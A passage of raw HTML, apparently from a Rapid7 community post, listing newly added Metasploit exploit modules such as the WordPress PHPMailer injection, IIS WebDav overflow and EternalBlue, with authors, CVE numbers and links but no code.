href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fmulti%2Fhttp%2Fbuilderengine_upload_exec\" target=\"_blank\">BuilderEngine Arbitrary File Upload Vulnerability and execution</a> by Marco Rivoli, and metanubix</li><li><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fmulti%2Fhttp%2Fmediawiki_syntaxhighlight\" target=\"_blank\">MediaWiki SyntaxHighlight extension option injection vulnerability</a> by Yorick Koster exploits CVE-2017-0372</li><li><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Funix%2Fwebapp%2Fwp_phpmailer_host_header\" target=\"_blank\">WordPress PHPMailer Host Header Command Injection</a> by wvu, and Dawid Golunski exploits CVE-2016-10033</li><li><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fwindows%2Fhttp%2Fdupscts_bof\" target=\"_blank\">Dup Scout Enterprise GET Buffer Overflow</a> by Daniel Teixeira, and vportal</li><li><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fwindows%2Fhttp%2Fserviio_checkstreamurl_cmd_exec\" target=\"_blank\">Serviio Media Server checkStreamUrl Command Execution</a> by Brendan Coles, and Gjoko Krstic(LiquidWorm)</li><li><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fwindows%2Fhttp%2Fsyncbreeze_bof\" target=\"_blank\">Sync Breeze Enterprise GET Buffer Overflow</a> by Daniel Teixeira</li><li><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fwindows%2Fiis%2Fiis_webdav_scstoragepathfromurl\" target=\"_blank\">Microsoft IIS WebDav ScStoragePathFromUrl Overflow</a> by Chen Wu, Dominic Chell, Lincoln, Rich Whitcroft, Zhiniang Peng, firefart, and zcgonvh exploits CVE-2017-7269</li><li><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fwindows%2Fsmb%2Fms17_010_eternalblue\" target=\"_blank\">MS17-010 EternalBlue SMB R